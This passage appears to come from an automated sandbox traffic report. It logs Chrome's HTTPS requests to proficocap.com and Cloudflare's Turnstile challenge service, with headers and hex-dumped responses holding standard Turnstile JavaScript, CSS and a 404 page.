                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-arch: "x86"
                                                                          sec-ch-ua-full-version: "117.0.5938.132"
                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                          sec-ch-ua-bitness: "64"
                                                                          sec-ch-ua-model: ""
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://proficocap.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:50:35 UTC870INHTTP/1.1 404 Not Found
                                                                          Date: Sun, 08 Dec 2024 19:50:35 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          X-Powered-By: ASP.NET
                                                                          X-Powered-By-Plesk: PleskWin
                                                                          Cache-Control: max-age=14400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 89
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3jHlaDt%2Bzxopfr6nGzfuoPGanpOx8wAlg9FV9Q2EQoaYzC8fecp%2FeiiNrnVBez13stIdykrbNL8bbrlvX3k0cql0h35FYe%2F21FUMs4KYlF7WtASSJIj76oEbUixmbutllw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8eef4905384641c1-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2343&min_rtt=2338&rtt_var=887&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1434&delivery_rate=1225860&cwnd=205&unsent_bytes=0&cid=01001f8050228c9b&ts=459&x=0"
                                                                          2024-12-08 19:50:35 UTC499INData Raw: 34 64 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20
                                                                          Data Ascii: 4dd<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404
                                                                          2024-12-08 19:50:35 UTC753INData Raw: 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63
                                                                          Data Ascii: #FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#c
                                                                          2024-12-08 19:50:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          14192.168.2.449764104.18.95.414431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:50:35 UTC413OUTGET /turnstile/v0/g/f9063374b04d/api.js?onload=fjGVd3&render=explicit HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:50:36 UTC471INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:50:36 GMT
                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                          Content-Length: 47692
                                                                          Connection: close
                                                                          accept-ranges: bytes
                                                                          last-modified: Tue, 03 Dec 2024 18:31:41 GMT
                                                                          cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                          access-control-allow-origin: *
                                                                          cross-origin-resource-policy: cross-origin
                                                                          Server: cloudflare
                                                                          CF-RAY: 8eef490b0dde8cda-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-12-08 19:50:36 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                          Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                          2024-12-08 19:50:36 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                          Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                          2024-12-08 19:50:36 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                          Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                          2024-12-08 19:50:36 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                          Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                          2024-12-08 19:50:36 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                          Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                          2024-12-08 19:50:36 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                                                          Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                                                          2024-12-08 19:50:36 UTC1369INData Raw: 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53
                                                                          Data Ascii: /rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES
                                                                          2024-12-08 19:50:36 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                                                                          Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                                                                          2024-12-08 19:50:36 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                                                          Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                                                                          2024-12-08 19:50:36 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                                                          Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          15192.168.2.449766104.18.95.414431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:50:36 UTC781OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/rgsuz/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/ HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-User: ?1
                                                                          Sec-Fetch-Dest: iframe
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:50:37 UTC1362INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:50:37 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 26656
                                                                          Connection: close
                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                          content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                          cross-origin-embedder-policy: require-corp
                                                                          cross-origin-opener-policy: same-origin
                                                                          cross-origin-resource-policy: cross-origin
                                                                          origin-agent-cluster: ?1
                                                                          accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                          critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                          referrer-policy: same-origin
                                                                          document-policy: js-profiling
                                                                          2024-12-08 19:50:37 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 65 65 66 34 39 31 31 61 38 65 31 34 33 63 62 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                          Data Ascii: Server: cloudflareCF-RAY: 8eef4911a8e143cb-EWRalt-svc: h3=":443"; ma=86400
                                                                          2024-12-08 19:50:37 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                          2024-12-08 19:50:37 UTC1369INData Raw: 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64
                                                                          Data Ascii: ding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiased
